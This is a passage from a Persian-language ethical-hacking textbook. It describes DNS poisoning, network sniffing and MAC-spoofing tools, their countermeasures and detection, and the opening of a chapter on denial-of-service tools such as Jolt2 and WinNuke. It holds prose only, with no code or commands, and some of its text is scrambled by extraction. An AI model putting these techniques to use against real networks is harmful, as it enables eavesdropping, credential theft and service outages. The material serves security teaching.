ﻣﻲ ﺷﻮد، وب ﺳﺎﻳﺖ ﺟﻌﻠﻲ را ﻣﻲ آورد و ﺷﻤﺎ ﻣﻲ ﺗﻮاﻧﻴﺪ ﭘﺴﻮرد را sniff ﻛﻨﻴﺪ و او را ﺑﻪ وب ﺳﺎﻳﺖ واﻗﻌﻲ ﺑﻔ ﺮﺳﺘﻴﺪ.

117

: : Proxy Server DNS Poisoning

ﺗﺮوﺟﺎﻧﻲ ﺑﺮاي Rebecca ارﺳﺎل ﻣﻲ ﺷﻮد و ﺗﻨﻈﻴﻤﺎت proxy server در Internet Explorer را ﺑﻪ ﻫﻜﺮ ﺗﻐﻴﻴﺮ ﻣﻲ دﻫﺪ . ﭘﻴﺎده ﺳﺎزي آن ﺳﺎده اﺳﺖ . .

: : DNS Cache Poisoning

ﺑﺮاي اﻳﻦ ﺣﻤﻠﻪ، ﻫﻜﺮ از آﺳﻴﺐ ﭘﺬﻳﺮي ﻛﻪ در ﻧﺮم اﻓﺰار DNS وﺟﻮد دارد اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . ﻃﺒﻖ اﻳﻦ آﺳﻴﺐ ﭘﺬﻳﺮي، اﻃﻼﻋﺎت ﻧﺎدرﺳﺖ را ﻣﻲ ﭘﺬﻳﺮد . اﮔﺮ ﺳﺮور، ﺑﻄﻮر ﺻﺤﻴﺢ، ﭘﺎﺳﺦ ﻫﺎي DNS را ﺑﺮرﺳﻲ ﻧﻜﻨﺪ ﺗﺎ ﺑﺪاﻧﺪ ﻛﻪ از ﻣﻨﺒﻊ ﻗﺎﻧﻮﻧﻲ ﻣﻲ آﻳﻨﺪ، ﺳﺮور، از ﻛﺶ ﻛﺮدن ورودي ﻫﺎي ﻧﺎدرﺳﺖ ﺧﻮدداري ﻣﻲ ﻛﻨﺪ . ﺑﺮاي ﻣﺜﺎل، ﻫﻜﺮ، ورودي DNS ﺑﺮاي ﻳﻚ

118

وب ﺳﺎﻳﺖ را رو ي ﻳﻚ ﺳﺮور DNS ، را ﺑﺎ آ درس IP ﺳﺮوري ﻛﻪ ﺧﻮدش ﻛﻨﺘﺮل ﻣﻲ ﻛﻨﺪ ﺟﺎﻳﮕﺰﻳﻦ ﻣﻲ ﻛﻨﺪ . ﺳﭙﺲ روي ﺳﺮوري ﻛﻪ ﻛﻨﺘﺮﻟﺶ ﻣﻲ ﻛﻨﺪ، ورودي ﻫﺎي ﺟﻌﻠﻲ ﺑﺮاي ﻓﺎﻳﻞ ﻫﺎ ﻣﻲ ﺳﺎزد . .

اﺑﺰارﻫﺎي ﻫﻚ EtherFlood ، ﺑﺮاي flood ﻛﺮدن ﻳﻚ ﺳﻮﺋﻴﭻ ﺑﺎ ﺗﺮاﻓﻴﻚ اﺳﺖ ﺗﺎ ﺗﺒﺪﻳﻞ ﺑﻪ ﻫﺎب ﺷﻮد . ﺑﺎ اﻳﻨﻜﺎر، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺗﻤﺎم ﺗﺮاﻓﻴﻚ روي ﺷﺒﻜﻪ را ﺑﺪﺳﺖ آورد . .

Dsniff ، ﻣﺠﻤﻮﻋﻪ اي از اﺑﺰارﻫﺎي اﺟﺮاﻳﻲ ﻳﻮﻧﻴﻜﺲ اﺳﺖ ﻛﻪ ﺑﺮاي ﺑﺮرﺳﻲ ﺷﺒﻜﻪ و اﻧﺠﺎم ﺗﺴﺖ ﻧﻔﻮذ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . اﺑﺰارﻫﺎي آن ﺷﺎﻣﻞ urlsnarf ، msgsnarf ، mailsnarf ، filesnarf ، و webspy اﺳﺖ . اﻳﻦ اﺑﺰارﻫﺎ ، ﺑﺼﻮرت ﭘﺴﻴﻮ، ﺷﺒﻜﻪ ﻫﺎي آﺳﻴﺐ ﭘﺬﻳﺮ را ﻣﺎﻧﻴﺘﻮر ﻣﻲ ﻛﻨﻨﺪ ﺗﺎ اﻃﻼﻋﺎت ﻣﻬﻢ از ﻗﺒﻴﻞ ﭘﺴﻮردﻫﺎ، اﻳﻤﻴﻞ، و ﻓﺎﻳﻞ ﻫﺎ را ﺑﺪﺳﺖ آورﻧﺪ . .

Sshmitm و webmitm ، ﺣﻤﻼت man-in-the-middle را ﺑﺮاي ﻧﺸﺴﺖ ﻫﺎي SSH و HTTPS اﻧﺠﺎم ﻣﻲ دﻫﻨﺪ . . dnsspoof ، Arpspoof ، و macof ، ﺑﺎ ﻣﺪاﺧﻠﻪ در ﺗﺮاﻓﻴﻚ ﺷﺒﻜﻪ ﺳﻮﺋﻴﭽﻲ ﻛﻪ ﻣﻌﻤﻮﻻ ﺑﻪ دﻟﻴﻞ ﺧﺎﺻﻴﺖ ﺳﻮﺋﻴﭽﻲ ﺑﻮدن ﺷﺒﻜﻪ، ﺑﺮاي ﺑﺮﻧﺎﻣﻪ sniffer ﻏﻴﺮ ﻗﺎﺑﻞ دﺳﺘﺮس اﺳﺖ، ﻛﺎر ﻣﻲ ﻛﻨﺪ . .

Cain & Abel ، اﺑﺰاري ﭼﻨﺪ ﻣﻨﻈﻮره ﺑﺮاي ﻫﻚ در وﻳﻨﺪوز اﺳﺖ ﻛﻪ ﺑﺎ اﺳﺘﻔﺎده از اﺳﺘﺮاق ﺳﻤﻊ ﺷﺒﻜﻪ، اﻣﻜﺎن ﺑﺎزﻳﺎﺑﻲ اﻧﻮاع ﭘﺴﻮردﻫﺎ، ﺷﻜﺴﺘﻦ ﭘﺴﻮردﻫﺎي رﻣﺰ ﺷﺪه ﺑﺎ اﺳﺘﻔﺎده از دﻳﻜﺸﻨﺮي، brute force ، ﺿﺒﻂ ﻣﻜﺎﻟﻤﺎت VoIP ، رﻣﺰﮔﺸﺎﻳﻲ ﭘﺴﻮردﻫﺎي ﭘﻴﭽﻴﺪه، ﻇﺎﻫﺮ ﻛﺮدن ﻛﺎدر ﭘﺴﻮرد، ﺑﺎزﻳﺎﺑﻲ ﭘﺴﻮردﻫﺎي ﻛﺶ ﺷﺪه، و آﻧﺎﻟﻴﺰ ﭘﺮوﺗﻜﻞ ﻫﺎي ﻣﺴﻴﺮﻳﺎﺑﻲ را ﻣﻲ دﻫﺪ . .

Packet Crafter ، اﺑﺰاري ﺑﺮاي ﺳﺎﺧﺖ ﺑﺴﺘ ﻪ ﻫﺎي ﺳﻔﺎرﺷﻲ TCP/IP/UDP اﺳﺖ . اﻳﻦ اﺑﺰار ﻣﻲ ﺗﻮاﻧﺪ آدرس ﻣﻨﺒﻊ ﻳﻚ ﺑﺴﺘﻪ را ﺗﻐﻴﻴﺮ دﻫﺪ و flage ﻫﺎي ﻣﺨﺘﻠﻒ آن را ﻛﻨﺘﺮل ﻛﻨﻴﺪ . .

SMAC ، اﺑﺰاري ﺑﺮاي ﺗﻐﻴﻴﺮ MAC address ﻳﻚ ﺳﻴﺴﺘﻢ اﺳﺖ و ﻫﻜﺮ ﻣ ﻲ ﺪﻧاﻮﺗ در زﻣﺎن ﺣﻤﻠﻪ، MAC address ﺧﻮد ﺮﻴﻴﻐﺗرا .ﺪﻫد .ﺪﻫد ﺮﻴﻴﻐﺗرا

MAC Changer ، اﺑﺰاري ﺑﺮاي ﺟﻌﻞ ﻳﻚ MAC address در ﻳﻮﻧﻴﻜﺲ اﺳﺖ . ﻣﻲ ﺗﻮاﻧﺪ ﻛﺎرت ﺷﺒﻜﻪ را ﺑﺎ ﻳﻚ MAC ﻣﺸﺨﺺ، MAC ﺗﺼﺎدﻓﻲ، MAC ﻓﺮوﺷﻨﺪه دﻳﮕﺮ، MAC دﻳﮕﺮي از ﻫﻤﺎن ﺳﺎزﻧﺪه ﺗﻨﻈﻴﻢ ﻛﻨﺪ، ﻳﺎ ﺣﺘﻲ ﻟﻴﺴﺖ MAC address ﻫﺎي ﺳﺎزﻧﺪه را ﻧﻤﺎﻳﺶ دﻫﺪ ﺗﺎ از آن ﻟﻴﺴﺖ ﻳﻜﻲ را اﻧﺘﺨﺎب ﻛﻨﻴﺪ . .

WinDNSSpoof ، اﺑﺰاري ﺳ ﺎده ﺑﻪ ﻣﻨﻈﻮر DNS ID spoofing ﺑﺮاي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ وﻳﻨﺪوز اﺳﺖ . ﺑﺮاي اﺳﺘﻔﺎده از آن در ﺷﺒﻜﻪ ﻫﺎي ﺳﻮﺋﻴﭽﻲ، ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺘﻮاﻧﻴﺪ ﺗﺮاﻓﻴﻚ روي ﻛﺎﻣﭙﻴﻮﺗﺮ را sniff ﻛﻨﻴﺪ . ﺑﻨﺎﺑﺮاﻳﻦ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺎ ﻳﻚ اﺑﺰار ARP spoofing ﻳﺎ flooding اﺳﺘﻔﺎده ﺷﻮد . .

Distributed DNS Flooder ، ﺗﻌﺪاد زﻳﺎدي ﻛﻮﺋﺮي ﻣﻲ ﻓﺮﺳﺘﺪ ﺗﺎ ﺣﻤﻠﻪ DoS اﻳﺠﺎد ﻛﻨﺪ و DNS را ﻏﻴﺮ ﻓﻌﺎل ﺳﺎزد .

119

اﮔﺮ ﻧﺮم اﻓﺰار DNS ، ﻛﻮﺋﺮي ﻫﺎي ﻏﻴﺮ ﺻﺤﻴﺢ را ﺛﺒﺖ ﻛﻨﺪ، ﺗﺎﺛﻴﺮ اﻳﻦ ﺣﻤﻠﻪ ﭼﻨﺪ ﺑﺮا ﺮﺑ ﻣﻲ ﺷﻮد . .

ﺑﺮﺧﻲ دﻳﮕﺮ از اﺑﺰارﻫﺎي اﺳﺘﺮاق ﺳﻤﻊ ﻋﺒﺎرﺗﻨﺪ از : : SmartSniff ، MSN Sniffer ، Win Sniffer ، Ace Password Sniffer ، Effetech ، ArpSpyX ، Ettercap ، AW ، Cloasoft EtherLook ، NetIntercept ، Etherpeek ، Snort ، EtherApe ، Ntop ، NetSetMan ، SMAC URL Snooper ، BillSniff ، Sniphere ، NetResident ، Sniffem ، CommView ، Ports Traffic Anakyzer ، EtherScan Analyzer ، Ipgrab ، AnalogX Packetmon ، EtherDetect Packet Sniffer . .

ﻣﻘﺎﺑﻠﻪ ﺑﺎ اﺳﺘﺮاق ﺳﻤﻊ

ﺑﻬﺘﺮﻳﻦ روش اﻣﻨﻴﺘﻲ ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از اﺳﺘﺮاق ﺳﻤﻊ در ﺷﺒﻜﻪ، رﻣﺰﮔﺬاري اﺳﺖ . ﻫﺮ ﭼﻨﺪ ﻛﻪ رﻣﺰﮔﺬاري، از اﺳﺘﺮاق ﺳﻤﻊ ﺟﻠﻮﮔﻴﺮي ﻧﻤﻲ ﻛﻨﺪ اﻣﺎ ﺳﺒﺐ ﻣﻲ ﺷﻮد ﻛﻪ داده ﻫﺎﻳﻲ ﻛﻪ در اﺳﺘﺮاق ﺳﻤﻊ، ﺑﻪ دﺳﺖ ﻫﻜﺮ ﻣﻲ اﻓﺘﺪ، ﻏﻴﺮ ﻗﺎﺑﻞ اﺳﺘﻔﺎده ﺑﺎﺷﻨﺪ ﺑﺮاي اﻳﻨﻜﻪ ﻫﻜﺮ ﻧﻤﻲ ﺗﻮاﻧﺪ اﻃﻼﻋﺎت را ﺗﺮﺟﻤﻪ و ﺗﻔﺴﻴﺮ ﻛﻨﺪ . اﻟﮕﻮرﻳﺘﻢ ﻫﺎي رﻣﺰﮔﺬاري از ﻗﺒﻴﻞ AES و RC4 ﻳﺎ RC5 ﻣﻲ ﺗﻮاﻧﻨﺪ در ﺗﻜﻨﻮﻟﻮژي ﻫﺎي VPN اﺳﺘﻔﺎده ﺷﻮﻧﺪ و روﺷﻲ راﻳﺞ ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از اﺳﺘﺮاق ﺳﻤﻊ در ﺷﺒﻜﻪ ﻫﺴﺘﻨﺪ . ﻫﻤﭽﻨﻴﻦ، ﻣﺤﺪودﻳﺖ در دﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﺑﻪ رﺳﺎﻧﻪ ﺷﺒﻜﻪ، اﻳﻦ اﻃﻤﻴﻨﺎن را ﻣﻲ دﻫﺪ ﻛﻪ packet sniffer ﻫﺎ ﻧﻤﻲ ﺗﻮاﻧﻨﺪ ﻧﺼﺐ ﺷﻮﻧﺪ . روش دﻳﮕﺮ ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از sniff ﺷﺪن ﺷﺒﻜﻪ، ﺗﻐﻴﻴﺮ ﺷﺒﻜﻪ ﺑﻪ SSH اﺳﺖ . .

روش ﻫﺎي ﻣﺘﻌﺪدي ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﻳﻚ sniffer در ﺷﺒﻜﻪ وﺟﻮد دارد : :

Ping method • ARP method • Latency method • • اﺳﺘﻔﺎده از IDS

120

اﺑﺰارﻫﺎي ﻫﻚ netINTERCEPTOR ، ﻓﺎﻳﺮوال وﻳﺮوس و اﺳﭙﻢ اﺳﺖ . ﮔﺰﻳﻨﻪ ﻫﺎي ﭘﻴﺸﺮﻓﺘﻪ اي ﺑﺮاي ﻓﻴﻠﺘﺮﻳﻨﮓ دارد و ﻣﻲ ﺗﻮاﻧﺪ اﺳﭙﻢ ﻫﺎي ﺟﺪﻳﺪ را ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ و آﻧﻬﺎ را ﻳﺎد ﺑﮕﻴﺮد . ﻫﻤﭽﻨﻴﻦ ﻣﻲ ﺗﻮاﻧﺪ آﺧﺮﻳﻦ وﻳﺮوس ﻫﺎ و ﺗﺮوﺟﺎن ﻫﺎي اﻳﻤﻴﻞ را اﺳﺘﺮاق ﺳﻤﻊ ﻛﻨﺪ و از ﻧﺼﺐ ﺗﺮوﺟﺎن ﻫﺎ ﻳﺎ sniffer ﻫﺎ ﺟﻠﻮﮔﻴﺮي ﻛﻨﺪ . .

Sniffdet ، ﻣﺠ ﻤﻮﻋﻪ اي از ﺗﺴﺖ ﻫﺎ ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ از راه دور sniffer ﻫﺎ در ﺷﺒﻜﻪ TCP/IP اﺳﺖ . Sniffdet ، اﻧﻮاع ﻣﺨﺘﻠﻒ ﺗﺴﺖ ﻫﺎ را ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﻣﺎﺷﻴﻦ ﻫﺎﻳﻲ ﻛﻪ ﺑﺼﻮرت promiscuous mode ﻛﺎر ﻣﻲ ﻛﻨﻨﺪ ﻳﺎ ﻳﻚ sniffer دارﻧﺪ، اﻧﺠﺎم ﻣﻲ دﻫﺪ . .

اﺑﺰارﻫﺎي دﻳﮕﺮي ﻧﻴﺰ ﭼﻮن Antisniff ، Promiscan ، ARP Watch و Prodetect ﺑﺮاي ﭘﻴﺸﮕﻴﺮي ﻳﺎ ﺷﻨﺎﺳﺎﻳﻲ sniffer ﻫﺎ ﺑﻜﺎر ﻣﻲ روﻧﺪ . .

121

ﻓﺼﻞ ﻫﻔﺘﻢ

Denial of Service و Session Hijacking

ﻣﻘﺪﻣﻪ

در ﺣﻤﻠﻪ DoS ، ﻫﻜﺮ ﺗﻼش ﻣﻲ ﻛﻨﺪ ﺗﺎ ﺳﺮﻋﺖ ﺳﻴﺴﺘﻢ را ﺑﻪ ﺷﺪت ﻛﺎﻫﺶ دﻫﺪ و ﻛﺎرﺑﺮان ﻧﺘﻮاﻧﻨﺪ از ﻣﻨﺎﺑﻊ آن اﺳﺘﻔﺎده ﻛﻨﻨﺪ . ﻫﻜﺮﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺗﻨﻬﺎ ﻳﻚ ﺳﻴﺴﺘﻢ و ﻳﺎ ﻳﻚ ﺷﺒﻜﻪ را ﻣﻮرد ﻫﺪف ﻗﺮار دﻫﻨﺪ و ﻣﻌﻤﻮﻻ ﻫﻢ در اﻳﻨﻜﺎر ﻣﻮﻓﻖ ﻣ ﻲﺷ .ﺪﻧﻮ .ﺪﻧﻮ session hijacking ( دزدي ﻧﺸﺴﺖ) ، ﻳﻜﻲ از روش ﻫﺎي ﻫﻚ اﺳﺖ . زﻣﺎﻧﻴﻜﻪ ﻫﻜﺮ، ﻧﺸﺴﺘﻲ را ﮔﺮﻓﺖ، ﻳﻚ DoS ﻣﻮﻗﺘﻲ را ﺑﺮاي ﻛﺎرﺑﺮ ﻧﻬﺎﻳﻲ اﻳﺠﺎد ﻣﻲ ﻛﻨﺪ . ﭘﺲ از آﻧﻜﻪ ﻛﺎرﺑﺮي ﻧﺸﺴﺖ ﻗﺎﻧﻮﻧﻲ را اﻳﺠﺎد ﻛﺮد، ﻫﻜﺮ ﺑﺎ اﺳﺘﻔﺎده از session hijacking ، ﻧﺸﺴﺖ را ﺑﻪ دﺳﺖ ﻣﻲ ﮔﻴﺮد . ﻫﻤﭽﻨﻴﻦ زﻣﺎﻧﻴﻜﻪ ﻫﻜﺮ ﺑﻴﻦ ﺳﺮور و ﻛﻼﻳﻨﺖ ﻗﺮار ﮔﺮﻓﺖ و ﺗﻤﺎم ﺗﺮاﻓﻴﻚ را اﺳﺘﺮاق ﺳﻤﻊ ﻛﺮد، از session hijacking ﺑﺮاي اﻧﺠﺎم ﺣﻤﻠﻪ man-in-the-middle ﻧﻴﺰ ﻣﻲ ﺗﻮاﻧﺪ اﺳﺘﻔﺎده ﻛﻨﺪ . .

اﻳﻦ ﻓﺼﻞ د ر ﻣﻮرد ﺣﻤﻼت session hijacking ، DDoS ، DoS ، دﺳﺖ ﺗﻜﺎﻧﻲ ﺳﻪ ﻣﺮﺣﻠﻪ اي TCP ، ﭘﻴﺸﮕﻮﻳﻲ sequence number و اﺑﺰارﻫﺎي اﻳﻦ ﺣﻤﻼت ﺗﻮﺿﻴﺢ ﻣﻲ دﻫﺪ . ﻫﻤﭽﻨﻴﻦ در ﭘﺎﻳﺎن ﻓﺼﻞ در ﻣﻮرد روش ﻫﺎي ﻣﻘﺎﺑﻠﻪ ﺑﺎ DoS و session hijacking ﺗﻮﺿﻴﺢ ﺧﻮاﻫﻴﻢ داد . .

123

Denial of Service

ﺣﻤﻠﻪ DoS ، ﺗﻼش ﺑﺮاي از ﻛﺎر اﻧﺪاﺧﺘﻦ ﺳﻴﺴﺘﻢ ﻛﺎرﺑﺮ ﻳﺎ ﺳﺎزﻣﺎن اﺳﺖ . دو ﻧﻮع ﺣﻤﻠﻪ DoS وﺟﻮد دارد . ﺷ ﺎﻤ ﻪﺑ ﻪﺑ ﺎﻤ ناﻮﻨﻋ ﻳﻚ ﻫﻜﺮ ﻗﺎﻧﻮﻧﻤﻨﺪ، ﺑﺎﻳﺪ ﺑﺎ اﻧﻮاع و ﻧﺤﻮه اﻧﺠﺎم ﺣﻤﻼت DoS ، و ﻧﻴﺰ BOTs ) robot ) و ﺷﺒﻜﻪ ﻫﺎي robot ( BOTNETs ،) ﺣﻤﻼت smurf و SYN flooding و ﻫﻤﭽﻨﻴﻦ ﺑﺎ روش ﻫﺎي ﻣﻘﺎﺑﻠﻪ ﺑﺎ DoS و DDoS آﺷﻨﺎ ﺑﺎﺷﻴﺪ . .

اﻧﻮاع ﺣﻤﻼت DoS

عﻮﻧدو ﺣﻤﻠ ﻪ DoS وﺟﻮد دارد : ﺣﻤﻼت DoS ﻣﻲ ﺗﻮاﻧﺪ ﺗﻮﺳﻂ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ دﻳﮕﺮ ( DoS ﺳﺎده ) ﻳﺎ

ﺗﻮﺳﻂ ﭼﻨﺪﻳﻦ ﺳﻴﺴﺘﻢ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ا مﺎﺠﻧ ﺷﻮد ( DDoS ).

ﻫﺪف از اﻳﻦ ﺣﻤﻠﻪ اﻳﻦ ﻧﻴﺴﺖ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﻳﺎ داده ﻫﺎي ﻫﺪف دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﻨﻴﻢ ﺑﻠﻜﻪ ﻫﺪف اﻳﻦ اﺳﺖ ﻛﻪ اﺟﺎزه ﺳﺮوﻳﺲ دﻫﻲ ﻛﺎرﺑﺮان ﻗﺎﻧﻮﻧﻲ را ﺑﮕﻴﺮﻳﻢ . ﻣﻤﻜﻦ اﺳﺖ ﺣﻤﻠﻪ DoS ﻛﺎرﻫﺎي زﻳﺮ را اﻧﺠﺎم دﻫﺪ : :

• ﺗﺮاﻓﻴﻚ ﻋﻈﻴﻤﻲ را ﺑﻪ ﺳﻮي ﺷﺒﻜﻪ رواﻧﻪ ﻛﻨﺪ ﺗﺎ ﺟﻠﻮي ﺗﺮاﻓﻴﻚ ﻣﺠﺎز ﺷﺒﻜﻪ را ﺑﮕﻴﺮد. • ارﺗﺒﺎط ﺑﻴﻦ دو ﻣﺎﺷﻴﻦ را ﻗﻄﻊ ﻛﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ، ﺟﻠﻮي دﺳﺘﺮﺳﻲ ﺑﻪ ﺳﺮوﻳﺲ را ﺑﮕﻴﺮد. • ﺟﻠﻮي دﺳﺘﺮﺳﻲ اﻓﺮاد ﺑﻪ ﺳﺮوﻳﺲ ار ﺑ ﮕﻴﺮد. • اﺟﺎزه دﺳﺘﺮﺳﻲ ﺳﻴﺴﺘﻢ ﻳﺎ ﺷﺨﺺ ﺧﺎﺻﻲ را از ﺳﺮوﻳﺲ ﺑﮕﻴﺮد . .

اﺑﺰارﻫﺎي ﻣﺨﺘﻠﻔﻲ وﺟﻮد دارﻧﺪ ﻛﻪ ﺗﺮاﻓﻴﻚ ﻫﺎي ﻣﺨﺘﻠﻔﻲ را ﺑﻪ ﺳﻤﺖ ﻗﺮﺑﺎﻧﻲ ﺳﺮازﻳﺮ ﻣﻲ ﻛﻨﻨﺪ اﻣﺎ ﻧﺘﻴﺠﻪ ﻳﻜﺴﺎن اﺳﺖ : ﺳﺮوﻳﺲ ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻳﺎ ﺷﺒﻜﻪ ﻏﻴﺮ ﻗﺎﺑﻞ دﺳﺘﺮس ﻣﻲ ﺷﻮد ﺑﺮاي اﻳﻨﻜﻪ ﻛﻞ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻢ ﺻﺮف ﭘﺎﺳﺦ ﺑﻪ درﺧﻮاﺳﺖ ﻫﺎي ﺑﻴﻬﻮده و ﺳﺎﺧﺘﮕﻲ ﻫﻜﺮ ﻣﻲ ﺷﻮد . .

ﺣﻤﻠﻪ DoS ، ﺣﻤﻠﻪ ﻏﻴﺮ ﺣﺮﻓﻪ اي اﺳﺖ ﺑﺮاي اﻳﻨﻜﻪ ﻫﻜﺮ ﻧﻤﻲ ﺗﻮاﻧﺪ ﺑﻪ اﻃﻼﻋﺎت دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﻨﺪ و ﻓﻘﻂ در ﺳﺮوﻳﺲ دﻫﻲ آن، اﺧﺘﻼل ﺑﻮﺟﻮد ﻣﻲآ ورد . اﮔﺮ ﺣﻤﻠﻪ DoS از ﻃﺮﻳﻖ ﭼﻨﺪﻳﻦ ﺳﻴﺴﺘﻢ ﺑﻪ ﺳﻤﺖ ﻣﻘﺼﺪ ارﺳﺎل ﺷﻮد، ﻣﺨﺮب ﺗﺮ ﻣﻲ ﺷﻮد و ﺗﺎﺛﻴﺮات ﻣﻬﻤﻲ را دارد ( ﺣﻤﻼت DDoS ). ).

اﺑﺰارﻫﺎي ﻫﻚ Jolt2 ، اﺑﺰاري ﺑﺮاي ﺣﻤﻠﻪ DoS اﺳﺖ ﻛﻪ ﺗﻌﺪاد زﻳﺎدي ﺑﺴﺘﻪ ﻫﺎي IP ﺑﻪ ﻳﻚ ﻫﺪف وﻳﻨﺪوزي ﻣﻲ ﻓﺮﺳﺘﺪ . اﻳﻦ ﺮﻣا ﺒﺳ ﺐ ﻣ ﻲ ﺷﻮد ﻛﻪ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻢ، ﻏﻴﺮ ﻗﺎﺑﻞ دﺳﺘﺮس ﺷﻮﻧﺪ و ﻧﻬﺎﻳﺘﺎ ﺳﻴﺴﺘﻢ از ﻛﺎر ﺑﻴﻔﺘﺪ . .

Bubonic ، اﺑﺰار ي ﺑﺮاي ﺣﻤﻠﻪ DoS اﺳﺖ ﻛﻪ ﺑﺎ ارﺳﺎل ﺑﺴﺘﻪ ﻫﺎي TCP ﻛﻪ داراي ﺗﻨﻈﻴﻤﺎت ﺗﺼﺎدﻓﻲ ﻫﺴﺘﻨﺪ، ﻛﺎر ﻣﻲ ﻛﻨﺪ ﺗﺎ ﺑﺎر ﻣﺎﺷﻴﻦ ﻫﺪف اﻓﺰاﻳﺶ ﻳﺎﺑﺪ و ﻧﻬﺎﻳﺘﺎ ﺳﻴﺴﺘﻢ از ﻛﺎر ﺑﻴﻔﺘﺪ . .

124

Ping of Death ، ﺣﻤﻠﻪ اي اﺳﺖ ﻛﻪ ﺑﺴﺘﻪ ﻫﺎي IP ﻛﻪ ﺑﺴﻴﺎر ﺑﺰرگ ﻫﺴﺘﻨﺪ را ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺪف ارﺳﺎل ﻣﻲ ﻛﻨﺪ، و ﺑ ﻪ دﻟﻴﻞ زﻳﺎد و ﺑﺰرگ ﺑﻮدن ﺑﺴﺘﻪ ﻫﺎ، ﺳﻴﺴﺘﻢ ﻫﺪف ﻧﻤﻲ ﺗﻮاﻧﺪ آﻧﻬﺎ را درﻳﺎﻓﺖ ﻛﻨﺪ و در ﻧﺘﻴﺠﻪ از ﻛﺎر ﻣﻲ اﻓﺘﺪ . Ping of Death ، ﻣﻲ ﺗﻮاﻧﺪ ﺟﻠﻮي دﺳﺘﺮﺳﻲ ﻛﻼﻳﻨﺖ ﻫﺎ ﺑﻪ ﺳﺮور ﻛﻪ ﻗﺮﺑﺎﻧﻲ ﺣﻤﻠﻪ ﺑﻮده اﺳﺖ را ﺑﮕﻴﺮد . .

SSPing ، ﺑﺮﻧﺎﻣﻪ اي اﺳﺖ ﻛﻪ ﭼﻨﺪﻳﻦ ﺑﺴﺘﻪ ﺑﺰرگ ICMP ار ﺑﻪ ﺳﻤﺖ ﺳﻴﺴﺘﻢ ﻫﺪف ارﺳﺎل ﻣﻲ ﻛﻨﺪ و ﺳﺒﺐ ﻣﻲ ﺷﻮد ﻛﻪ ﻛﺎﻣﭙﻴﻮﺗﺮي ﻛﻪ ﺑﺴﺘﻪ ﻫﺎي داده را درﻳﺎﻓﺖ ﻣﻲ ﻛﻨﺪ، زﻣﺎﻧﻴﻜﻪ دوﺑﺎره ﺑﺴﺘﻪ ﻫﺎ را ﺟﻤﻊ آوري ﻣﻲ ﻛﻨﺪ، از ﻛﺎر ﺑﻴﻔﺘﺪ . .

A LAND Attack ، ﺑﺴﺘﻪ اي ﺑﻪ ﺳﻤﺖ ﻳﻚ ﺳﻴﺴﺘﻢ ارﺳﺎل ﻣﻲ ﻛﻨﺪ ﻛﻪ IP ﻣﻨﺒﻊ ﺑﺎ آدرس IP ﺳﻴﺴﺘﻢ ﻣﻘﺼﺪ ﻳﻜﻲ اﺳﺖ . در ﻧﺘﻴﺠﻪ، ﺳﻴﺴﺘﻢ ﻣﻲ ﺧﻮاﻫﺪ ﻛﻪ ﺑﻪ آن ﭘﺎﺳﺦ دﻫﺪ و loop اﻳﺠﺎد ﻣﻲ ﺷﻮد ﺑﻨﺎﺑﺮاﻳﻦ، ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻢ، ﻏﻴﺮ ﻗﺎﺑﻞ دﺳﺘﺮس ﻣﻲ ﺷﻮﻧﺪ و ﻣﻤﻜﻦ اﺳﺖ ﺳﺮاﻧﺠﺎم ﺳﻴﺴﺘﻢ از ﻛﺎر ﺑﻴﻔﺘﺪ . .

CPU Hog ، اﺑﺰاري ﺑﺮاي ﺣﻤﻠﻪ DoS اﺳﺖ ﻛﻪ از ﻣﻨﺎﺑﻊ CPU روي ﺳﻴﺴﺘﻢ ﻫﺪف اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ و آن را ﺑﺮاي ﻛﺎرﺑﺮ نا دﻳﮕﺮ، ﻏﻴﺮ ﻗﺎﺑﻞ دﺳﺘﺮس ﻣﻲ ﺳﺎزد . .

WinNuke ، ﺑﺮﻧﺎﻣﻪ اي اﺳﺖ ﻛﻪ ﺑﻪ دﻧﺒﺎل ﺳﻴﺴﺘﻤﻲ ﺑﺎ ﭘﻮرت 139 ﺑﺎز ﻣﻲ ﮔﺮدد و ﺗﺮاﻓﻴﻚ IP ﻧﺎﺧﻮاﺳﺘﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺪف روي آن ﭘﻮرت ﻣﻲ ﻓﺮﺳﺘﺪ . اﻳﻦ ﺣﻤﻠﻪ، ﺑﺎ ﻧﺎم ﺣﻤﻠﻪ OOB ) Out of Bounds ) ﻣﺸﻬﻮر اﺳﺖ و ﺳﺒﺐ ﺳﺮرﻳﺰي ﺑﺎﻓﺮ ( buffer overflow ) ﻣﻲ ﺷﻮد و ﺳﺮاﻧﺠﺎم ﺳﻴﺴﺘﻢ از ﻛﺎر ﻣﻲ اﻓﺘﺪ . .

